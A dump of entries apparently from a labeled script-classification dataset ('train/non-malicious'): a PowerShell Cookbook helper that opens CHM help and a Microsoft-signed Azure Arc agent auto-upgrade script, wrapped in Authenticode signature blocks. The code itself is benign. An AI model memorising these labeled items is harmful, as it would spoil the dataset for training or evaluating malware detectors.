gdUwgdIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH # EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNV # BAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEmMCQGA1UE # CxMdVGhhbGVzIFRTUyBFU046RkM0MS00QkQ0LUQyMjAxJTAjBgNVBAMTHE1pY3Jv # c29mdCBUaW1lLVN0YW1wIFNlcnZpY2WgghF4MIIHJzCCBQ+gAwIBAgITMwAAAeKZ # mZXx3OMg6wABAAAB4jANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEG # A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWlj # cm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFt # cCBQQ0EgMjAxMDAeFw0yMzEwMTIxOTA3MjVaFw0yNTAxMTAxOTA3MjVaMIHSMQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNy # b3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxl # cyBUU1MgRVNOOkZDNDEtNEJENC1EMjIwMSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt # ZS1TdGFtcCBTZXJ2aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA # tWO1mFX6QWZvxwpCmDabOKwOVEj3vwZvZqYa9sCYJ3TglUZ5N79AbMzwptCswOiX # sMLuNLTcmRys+xaL1alXCwhyRFDwCRfWJ0Eb0eHIKykBq9+6/PnmSGXtus9DHsf3 # 1QluwTfAyamYlqw9amAXTnNmW+lZANQsNwhjKXmVcjgdVnk3oxLFY7zPBaviv3GQ # yZRezsgLEMmvlrf1JJ48AlEjLOdohzRbNnowVxNHMss3I8ETgqtW/UsV33oU3EDP # Cd61J4+DzwSZF7OvZPcdMUSWd4lfJBh3phDt4IhzvKWVahjTcISD2CGiun2pQpwF # R8VxLhcSV/cZIRGeXMmwruz9kY9Th1odPaNYahiFrZAI6aSCM6YEUKpAUXAWaw+t # mPh5CzNjGrhzgeo+dS7iFPhqqm9Rneog5dt3JTjak0v3dyfSs9NOV45Sw5BuC+VF # 22EUIF6nF9vqduynd9xlo8F9Nu1dVryctC4wIGrJ+x5u6qdvCP6UdB+oqmK+nJ3s # oJYAKiPvxdTBirLUfJidK1OZ7hP28rq7Y78pOF9E54keJKDjjKYWP7fghwUSE+iB # oq802xNWbhBuqmELKSevAHKqisEIsfpuWVG0kwnCa7sZF1NCwjHYcwqqmES2lKbX # Pe58BJ0+uA+GxAhEWQdka6KEvUmOPgu7cJsCaFrSU6sCAwEAAaOCAUkwggFFMB0G # A1UdDgQWBBREhA4R2r7tB2yWm0mIJE2leAnaBTAfBgNVHSMEGDAWgBSfpxVdAF5i # XYP05dJlpxtTNRnpcjBfBgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENB # JTIwMjAxMCgxKS5jcmwwbAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRw # Oi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRp # bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1Ud # JQEB/wQMMAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsF # AAOCAgEA5FREMatVFNue6V+yDZxOzLKHthe+FVTs1kyQhMBBiwUQ9WC9K+ILKWvl # qneRrvpjPS3/qXG5zMjrDu1eryfhbFRSByPnACGc2iuGcPyWNiptyTft+CBgrf7A # TAuE/U8YLm29crTFiiZTWdT6Vc7L1lGdKEj8dl0WvDayuC2xtajD04y4ANLmWDui # StdrZ1oI4afG5oPUg77rkTuq/Y7RbSwaPsBZ06M12l7E+uykvYoRw4x4lWaST87S # BqeEXPMcCdaO01ad5TXVZDoHG/w6k3V9j3DNCiLJyC844kz3eh3nkQZ5fF8Xxuh8 # tWVQTfMiKShJ537yzrU0M/7H1EzJrabAr9izXF28OVlMed0gqyx+a7e+79r4EV/a # 4ijJxVO8FCm/92tEkPrx6jjTWaQJEWSbL/4GZCVGvHatqmoC7mTQ16/6JR0FQqZf # +I5opnvm+5CDuEKIEDnEiblkhcNKVfjvDAVqvf8GBPCe0yr2trpBEB5L+j+5haSa # +q8TwCrfxCYqBOIGdZJL+5U9xocTICufIWHkb6p4IaYvjgx8ScUSHFzexo+ZeF7o # yFKAIgYlRkMDvffqdAPx+fjLrnfgt6X4u5PkXlsW3SYvB34fkbEbM5tmab9zekRa # 0e/W6Dt1L8N+tx3WyfYTiCThbUvWN1EFsr3HCQybBj4Idl4xK8EwggdxMIIFWaAD # AgECAhMzAAAAFcXna54Cm0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3Nv # ZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIy # MjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5 # vQ7VgtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64 # NmeFRiMMtY0Tz3cywBAY6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhu # je3XD9gmU3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl # 3GoPz130/o5Tz9bshVZN7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPg # yY9+tVSP3PoFVZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I # 5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2 # ci/bfV+AutuqfjbsNkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/ # TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy # 16cg8ML6EgrXY28MyTZki1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y # 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6H # XtqPnhZyacaue7e3PmriLq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMB # AAEwIwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQW # BBSfpxVdAF5iXYP05dJlpxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30B # ATBBMD8GCCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L0RvY3MvUmVwb3NpdG9yeS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYB # BAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMB # Af8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBL # oEmgR4ZFaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMv # TWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggr # BgEFBQcwAoY+aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS # b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1Vffwq # reEsH2cBMSRb4Z5yS/ypb+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27 # DzHkwo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pv # vinLbtg/SHUB2RjebYIM9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9Ak # vUCgvxm2EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWK # NsIdw2FzLixre24/LAl4FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2 # kQH2zsZ0/fZMcm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+ # c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep # 8beuyOiJXk+d0tBMdrVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+Dvk # txW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1Zyvg # DbjmjJnW4SLq8CdCPSWU5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/ # 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIC1DCCAj0CAQEwggEAoYHYpIHV # MIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsT # HVRoYWxlcyBUU1MgRVNOOkZDNDEtNEJENC1EMjIwMSUwIwYDVQQDExxNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQAWm5lp+nRuekl0 # iF+IHV3ylOiGb6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw # MA0GCSqGSIb3DQEBBQUAAgUA6ZEtdjAiGA8yMDI0MDMwNTEzMzQ0NloYDzIwMjQw # MzA2MTMzNDQ2WjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDpkS12AgEAMAcCAQAC # AgdzMAcCAQACAhFyMAoCBQDpkn72AgEAMDYGCisGAQQBhFkKBAIxKDAmMAwGCisG # AQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZIhvcNAQEFBQAD # gYEAgXJaLr8j62n4+AU4KJ+z1wD/n0aUssWAFil/CuaAp+knL3PDkD56JgzATrt3 # VGYOwiuTUQi/u3NVwFmxfi4hUC6+Wx1zOjW0Cz1t17/Hxg8WaVpK2vGuJV8ba15i # 0Wfb5zc93XkQt9avwGsYy22qFKdeamxlm7jwKy1ziXwKhXYxggQNMIIECQIBATCB # kzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAeKZmZXx3OMg6wAB # AAAB4jANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJ # EAEEMC8GCSqGSIb3DQEJBDEiBCBQH5kTYRHbJv4f2CaTXhydu8z8eHfu4ITfeCZs # uTaMtDCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICuJKkoQ/Sa4xsFQRM4O # gvh3ktToj9uO5whmQ4kIj3//MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg # UENBIDIwMTACEzMAAAHimZmV8dzjIOsAAQAAAeIwIgQgqbf/eKOX3nOGXeSjgL95 # +FrojDDew+mQvyX8mbOxSHYwDQYJKoZIhvcNAQELBQAEggIAhS64c/dbZbDAPcX1 # YmJbDOTrG+hSdy2gmZUKtFBf7aYwBctofZ/FtN3KQmyeJGfLS2xvidUJ2Ra73bnN # 1b91JaDaCqKTOZHdf4ol/NxGMTzom5BjyPavVstDIlAvGPsBMvO3AiZc6JbBeG62 # gcqGV1v6t6E1kBtM6ph9LSPxFRgZE1Pbeklwkk4EEMi5lseJR4mkz41SlqKMgw5k # 3Cmd/KpAY0L2X6aKl5x1f15VF6UbmAXjZHsHzT+8WqZehGXPRJXUewlLJzAa9+JK # B5+VWWN38Fn+k4IbkWXUJbcmKuQhQgT4Z/BXVNXJpUJb1gH2zy8gDQmG9zD2TT1J # lJ7GZIRr+8wbQibnCVn32G7LBGVxabPMsEMBc9YhNqxRXBS3hORCnfBGOLJQC0j+ # twbDHM1M+osGAmdRbe6grtLbszjqzsrzPIBCu+FldAdwCW37biw95tnrn1GxEz2m # 3JJqyd+dPxm293iM8trxuIbtoVyKX+LYjmpqFeCrxSmL/8sgujOIwga44QDHRGyd # 6eW80vI+/KaJaS8vNNs/VMs22boP5x9CqizHYVU/65uJKBZTaKic+E61VHFW+CIh # EhK+pUBq6242YbAfHvQi53sPWK9hB/lgSltI0bHqF36LDelqHdjj/Ti7nTioh6A+ # lX6+vLXBOodS7wqRtJ6etG+zcRA= # SIG # End signature block
combined_dataset/train/non-malicious/Show-HtmlHelp.ps1
Show-HtmlHelp.ps1
##############################################################################\n##\n## Show-HtmlHelp\n##\n## From Windows PowerShell Cookbook (O'Reilly)\n## by Lee Holmes (http://www.leeholmes.com/guide)\n##\n##############################################################################\n\n<#\n\n.SYNOPSIS\n\nLaunches the CHM version of PowerShell help.\n\n.EXAMPLE\n\nShow-HtmlHelp\n\n#>\n\nSet-StrictMode -Version Latest\n\n$path = (Resolve-Path c:\\windows\\help\\mui\\*\\WindowsPowerShellHelp.chm).Path\nhh "$path::/html/defed09e-2acd-4042-bd22-ce4bf92c2f24.htm"
combined_dataset/train/non-malicious/sample_63_53.ps1
sample_63_53.ps1
# Copyright (c) Microsoft Corporation. # # This script will # 1. Examine Azcmagent configuration # 2. Check if automatic upgrade is enabled # 3. Check if desired version is greater than existing agent version # 4. Check if automatic upgrade has already been attempted before # 5. Get the download link # 6. Execute install_azcmagent.ps1 to upgrade # # For more information: https://aka.ms/ArcAgentUpgrade #Requires -RunAsAdministrator $ErrorActionPreference="SilentlyContinue" Stop-Transcript | out-null $ErrorActionPreference = 'Stop' function Invoke-Failure { [CmdletBinding()] param( [Parameter(Mandatory=$true)] $Message, [Parameter(Mandatory=$true)] $ErrorCode, [Parameter(Mandatory=$false)] $Details ) $ex = new-object -TypeName System.Exception -ArgumentList @($Message) $ex.Data["Details"] = $details $ex.Data["ErrorCode"] = $errorcode throw $ex } function Send-Log { [CmdletBinding()] param ( [Parameter(Mandatory = $true)] [string] $Message, [Parameter(Mandatory = $true)] [string] $Code, [Parameter(Mandatory = $true)] [PSCustomObject] $Show ) $hisEndpoint = "https://gbl.his.arc.azure.com" if ($Show.cloud -eq "AzureUSGovernment") { $hisEndpoint = "https://gbl.his.arc.azure.us" } elseif ($Show.cloud -eq "AzureChinaCloud") { $hisEndpoint = "https://gbl.his.arc.azure.cn" } $logBody = @{subscriptionId=$Show.subscriptionId;resourceGroup=$Show.resourceGroup;resourceName=$Show.resourceName;tenantId=$Show.tenantId;location=$Show.location;correlationId=$Show.correlationId;operation="upgrading";messageType="$Code";message="$Message";} Invoke-WebRequest -UseBasicParsing -Uri "$hisEndpoint/log" -Method "PUT" -Body ($logBody | ConvertTo-Json) -TimeoutSec 60 -ErrorAction SilentlyContinue | out-null } try { try { $show = azcmagent show --json | ConvertFrom-Json } catch { Invoke-Failure -ErrorCode "AZCM0161" -Message "azcmagent show command failed: $_" } try { $enabled = azcmagent config get automaticupgrade.enabled if ($enabled -ne "true") { Send-Log "automaticupgrade.enabled not enabled" "AZCM0162" $show exit 0 } } catch { Invoke-Failure -ErrorCode "AZCM0163" -Message "unable to get automaticupgrade.enabled flag: $_" } try { $desiredVersion = azcmagent config get automaticupgrade.desiredversion } catch { Invoke-Failure -ErrorCode "AZCM0164" -Message "unable to get automaticupgrade.desiredversion: $_" } $agentVersion = $show.agentVersion if ([System.Version]$agentVersion -gt [System.Version]$desiredVersion) { Send-Log "automaticupgrade.desiredversion $desiredVersion not greater than existing agent version $agentVersion" "AZCM0165" $show exit 0 } try { $lastattempt = azcmagent config get automaticupgrade.lastattempt.status } catch { Invoke-Failure -ErrorCode "AZCM0166" -Message "unable to get automaticupgrade.lastattempt.status field: $_" } if ($lastattempt -eq "success") { Send-Log "Last attempt was successful, skipping upgrade" "AZCM0167" $show exit 0 } if ($lastattempt -eq "failed") { Send-Log "Last attempt failed, skipping upgrade" "AZCM0168" $show exit 0 } try { $downloadlink = azcmagent config get automaticupgrade.downloadlink } catch { Invoke-Failure -ErrorCode "AZCM0169" -Message "unable to get automaticupgrade.downloadlink: $_" } # do the upgrade using the on-boarding script $onboardingScriptPath = Join-Path -Path $env:ProgramFiles -ChildPath "AzureConnectedMachineAgent" | Join-Path -ChildPath "install_azcmagent.ps1" $outfilePath = Join-Path -Path $env:ProgramFiles -ChildPath "AzureConnectedMachineAgent" | Join-Path -ChildPath "install_output.txt" $timestamp = Get-Date -UFormat %s -Millisecond 0 & $onboardingScriptPath -AltDownload $downloadlink -OutFile $outfilePath if ($LastExitCode -ne 0) { azcmagent config set automaticupgrade.lastattempt.status failed $outputJson = Get-Content $outfilePath | Out-String | ConvertFrom-Json if ($outputJson.error.details) { azcmagent config set automaticupgrade.lastattempt.message $outputJson.error.details } else { azcmagent config set automaticupgrade.lastattempt.message $outputJson.error.message } # no need to send logs to HIS since install_azcmagent.ps1 already sends logs if there is a failure } else { azcmagent config set automaticupgrade.lastattempt.status success azcmagent config set automaticupgrade.lastattempt.message "Success" Send-Log "Upgrade was successful" "AZCM0170" $show } azcmagent config set automaticupgrade.lastattempt.desiredversion $desiredVersion azcmagent config set automaticupgrade.lastattempt.timestamp $timestamp } catch { $code = $_.Exception.Data.ErrorCode if(!$code) { $code = "AZCM0150" } # default if we do not have some more specific error Write-Error $_ -ErrorAction Continue Send-Log $_.Exception $code $show exit 1 } # SIG # Begin signature block # MIInzgYJKoZIhvcNAQcCoIInvzCCJ7sCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCULJ8pAe0ZREBG # d/DxRBVTjajdYHXRe1KrKhSxBPSYbaCCDYUwggYDMIID66ADAgECAhMzAAADri01 # UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG # yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899 # QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82 # 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV # M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd # WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W # 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY # 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV # APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37 # ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57 # xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t # Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i # 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk # 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK # 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO # zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA # A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # 